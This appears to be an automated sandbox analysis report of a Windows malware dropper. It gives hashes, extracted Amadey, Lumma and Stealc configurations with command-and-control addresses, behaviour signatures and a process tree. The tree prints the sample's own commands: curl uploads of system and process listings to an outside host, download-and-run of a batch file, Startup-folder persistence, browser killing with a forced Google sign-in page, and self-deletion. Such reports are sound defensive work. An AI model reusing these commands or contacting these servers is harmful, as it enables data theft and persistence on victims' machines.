Analysis

  • max time kernel
    143s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-12-2024 07:57

General

  • Target

    c0d8949a43e4f44feb242e6005244765936ea303098a7e517e0e5d2450c45a69.exe

  • Size

    3.1MB

  • MD5

    710c44d15b43173067b038379c47ffe9

  • SHA1

    c3a27447cb2c87d4830e0d425f614d46402708cb

  • SHA256

    c0d8949a43e4f44feb242e6005244765936ea303098a7e517e0e5d2450c45a69

  • SHA512

    77e6670f844a3e4debdb7c71d1c5701d55735da729d511ac02f7b9b84cd818aba491f912e097a332d80b14067f45a089f3484db95f0adc3aaece0c6d1a7ed695

  • SSDEEP

    49152:sAbDVEobeGgdXmq8HPdzC57HODwfBJzKfpmaoM1gnHrjMq:JiobeGQXmq8HPdG57qOy1gnHr

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

lumma

C2

https://sordid-snaked.cyou/api

https://awake-weaves.cyou/api

https://wrathful-jammy.cyou/api

https://debonairnukk.xyz/api

https://diffuculttan.xyz/api

https://effecterectz.xyz/api

https://deafeninggeh.biz/api

https://immureprech.biz/api

https://impend-differ.biz/api

https://print-vexer.biz/api

https://dare-curbys.biz/api

https://covery-mover.biz/api

https://formy-spill.biz/api

https://dwell-exclaim.biz/api

https://zinc-sneark.biz/api

https://se-blurry.biz/api

https://drive-connect.cyou/api

Extracted

Family

stealc

Botnet

stok

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

lumma

C2

https://immureprech.biz/api

https://deafeninggeh.biz/api

https://effecterectz.xyz/api

https://diffuculttan.xyz/api

https://debonairnukk.xyz/api

https://wrathful-jammy.cyou/api

https://awake-weaves.cyou/api

https://sordid-snaked.cyou/api

https://drive-connect.cyou/api

https://covery-mover.biz/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 4 IoCs
  • Executes dropped EXE 21 IoCs
  • Identifies Wine through registry keys 2 TTPs 8 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 53 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 5 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 27 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 37 IoCs
  • Suspicious use of SendNotifyMessage 35 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\c0d8949a43e4f44feb242e6005244765936ea303098a7e517e0e5d2450c45a69.exe
    "C:\Users\Admin\AppData\Local\Temp\c0d8949a43e4f44feb242e6005244765936ea303098a7e517e0e5d2450c45a69.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:3780
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:968
      • C:\Users\Admin\AppData\Local\Temp\1014031001\IGEaNGi.exe
        "C:\Users\Admin\AppData\Local\Temp\1014031001\IGEaNGi.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3216
        • C:\Users\Admin\AppData\Local\Temp\1014031001\IGEaNGi.exe
          "C:\Users\Admin\AppData\Local\Temp\1014031001\IGEaNGi.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:2928
      • C:\Users\Admin\AppData\Local\Temp\1014060001\05784df5e8.exe
        "C:\Users\Admin\AppData\Local\Temp\1014060001\05784df5e8.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:5108
        • C:\Users\Admin\AppData\Local\Temp\1014060001\05784df5e8.exe
          "C:\Users\Admin\AppData\Local\Temp\1014060001\05784df5e8.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:2740
      • C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe
        "C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:2600
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3672
          • C:\Windows\SysWOW64\systeminfo.exe
            systeminfo
            5⤵
            • System Location Discovery: System Language Discovery
            • Gathers system information
            PID:2652
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist
            5⤵
            • Enumerates processes with tasklist
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:876
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F5A4D43565351532F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2852
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F4F5A4D43565351532F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4852
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c type "C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"
          4⤵
          • Drops startup file
          • System Location Discovery: System Language Discovery
          PID:4600
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F4F5A4D43565351532F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1132
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3156
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F5A4D43565351532F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4528
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F4F5A4D43565351532F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2020
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c type "C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"
          4⤵
          • Drops startup file
          • System Location Discovery: System Language Discovery
          PID:1404
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F4F5A4D43565351532F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2224
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt
          4⤵
          • System Location Discovery: System Language Discovery
          PID:5296
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F5A4D43565351532F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:5348
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F4F5A4D43565351532F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:880
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c type "C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"
          4⤵
          • Drops startup file
          • System Location Discovery: System Language Discovery
          PID:3228
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F4F5A4D43565351532F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3680
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt
          4⤵
          • System Location Discovery: System Language Discovery
          PID:5328
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F5A4D43565351532F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:5300
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F4F5A4D43565351532F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4464
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c type "C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"
          4⤵
          • Drops startup file
          • System Location Discovery: System Language Discovery
          PID:2544
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F4F5A4D43565351532F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4424
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt
          4⤵
          • System Location Discovery: System Language Discovery
          PID:5376
        • C:\Windows\SysWOW64\curl.exe
          curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F5A4D43565351532F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:5440
      • C:\Users\Admin\AppData\Local\Temp\1014305001\IGEaNGi.exe
        "C:\Users\Admin\AppData\Local\Temp\1014305001\IGEaNGi.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4720
        • C:\Users\Admin\AppData\Local\Temp\1014305001\IGEaNGi.exe
          "C:\Users\Admin\AppData\Local\Temp\1014305001\IGEaNGi.exe"
          4⤵
          • Executes dropped EXE
          PID:3788
        • C:\Users\Admin\AppData\Local\Temp\1014305001\IGEaNGi.exe
          "C:\Users\Admin\AppData\Local\Temp\1014305001\IGEaNGi.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:4752
      • C:\Users\Admin\AppData\Local\Temp\1014317001\fd9af10ce6.exe
        "C:\Users\Admin\AppData\Local\Temp\1014317001\fd9af10ce6.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2968
      • C:\Users\Admin\AppData\Local\Temp\1014318001\5400a43fd5.exe
        "C:\Users\Admin\AppData\Local\Temp\1014318001\5400a43fd5.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:2904
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM firefox.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2192
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM chrome.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4880
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM msedge.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3228
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM opera.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2180
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM brave.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4472
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
          4⤵
            PID:2808
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
              5⤵
              • Checks processor information in registry
              • Modifies registry class
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of SetWindowsHookEx
              PID:1148
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1976 -parentBuildID 20240401114208 -prefsHandle 1892 -prefMapHandle 1884 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9dab5629-aed5-4697-a79c-8ed048653d0a} 1148 "\\.\pipe\gecko-crash-server-pipe.1148" gpu
                6⤵
                  PID:1552
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2444 -parentBuildID 20240401114208 -prefsHandle 2436 -prefMapHandle 2424 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dd57c340-6767-491e-9c4a-8771ab0ac2be} 1148 "\\.\pipe\gecko-crash-server-pipe.1148" socket
                  6⤵
                    PID:4600
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3236 -childID 1 -isForBrowser -prefsHandle 3228 -prefMapHandle 2744 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {17ca7df0-c560-4cc4-86eb-aaa21dbd7cf7} 1148 "\\.\pipe\gecko-crash-server-pipe.1148" tab
                    6⤵
                      PID:2276
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3216 -childID 2 -isForBrowser -prefsHandle 4008 -prefMapHandle 4004 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7be29c07-d210-4d59-89ec-2b2b04a2d50e} 1148 "\\.\pipe\gecko-crash-server-pipe.1148" tab
                      6⤵
                        PID:3692
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4620 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4568 -prefMapHandle 4592 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {039a148f-765b-4226-b7f3-b6ab14d4b22c} 1148 "\\.\pipe\gecko-crash-server-pipe.1148" utility
                        6⤵
                        • Checks processor information in registry
                        PID:3892
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5388 -childID 3 -isForBrowser -prefsHandle 5448 -prefMapHandle 5552 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0a40f944-ed56-4637-a5dd-b0435e08a845} 1148 "\\.\pipe\gecko-crash-server-pipe.1148" tab
                        6⤵
                          PID:4664
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4200 -childID 4 -isForBrowser -prefsHandle 5660 -prefMapHandle 5664 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9cbc78b8-ed8e-43fa-9c67-1f57a29e8baf} 1148 "\\.\pipe\gecko-crash-server-pipe.1148" tab
                          6⤵
                            PID:4544
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5860 -childID 5 -isForBrowser -prefsHandle 5632 -prefMapHandle 5628 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4d7cd695-f1ee-475b-929c-4f355e76b6f4} 1148 "\\.\pipe\gecko-crash-server-pipe.1148" tab
                            6⤵
                              PID:2524
                      • C:\Users\Admin\AppData\Local\Temp\1014319001\275305789c.exe
                        "C:\Users\Admin\AppData\Local\Temp\1014319001\275305789c.exe"
                        3⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4876
                      • C:\Users\Admin\AppData\Local\Temp\1014320001\20f87bf759.exe
                        "C:\Users\Admin\AppData\Local\Temp\1014320001\20f87bf759.exe"
                        3⤵
                        • Modifies Windows Defender Real-time Protection settings
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Windows security modification
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:6068
                      • C:\Users\Admin\AppData\Local\Temp\1014321001\TdDkUco.exe
                        "C:\Users\Admin\AppData\Local\Temp\1014321001\TdDkUco.exe"
                        3⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        • Checks processor information in registry
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2932
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1014321001\TdDkUco.exe" & rd /s /q "C:\ProgramData\DB1V3WTJW4E3" & exit
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:5552
                          • C:\Windows\SysWOW64\timeout.exe
                            timeout /t 10
                            5⤵
                            • System Location Discovery: System Language Discovery
                            • Delays execution with timeout.exe
                            PID:5812
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 2932 -s 1900
                          4⤵
                          • Program crash
                          PID:5756
                      • C:\Users\Admin\AppData\Local\Temp\1014322001\c1500829db.exe
                        "C:\Users\Admin\AppData\Local\Temp\1014322001\c1500829db.exe"
                        3⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:5408
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 5408 -s 640
                          4⤵
                          • Program crash
                          PID:5188
                      • C:\Users\Admin\AppData\Local\Temp\1014323001\pcrndBC.exe
                        "C:\Users\Admin\AppData\Local\Temp\1014323001\pcrndBC.exe"
                        3⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        • Checks processor information in registry
                        • Suspicious behavior: EnumeratesProcesses
                        PID:6116
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1014323001\pcrndBC.exe" & rd /s /q "C:\ProgramData\QQIEKNGVAAAA" & exit
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:5440
                          • C:\Windows\SysWOW64\timeout.exe
                            timeout /t 10
                            5⤵
                            • System Location Discovery: System Language Discovery
                            • Delays execution with timeout.exe
                            PID:5832
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 6116 -s 1948
                          4⤵
                          • Program crash
                          PID:5768
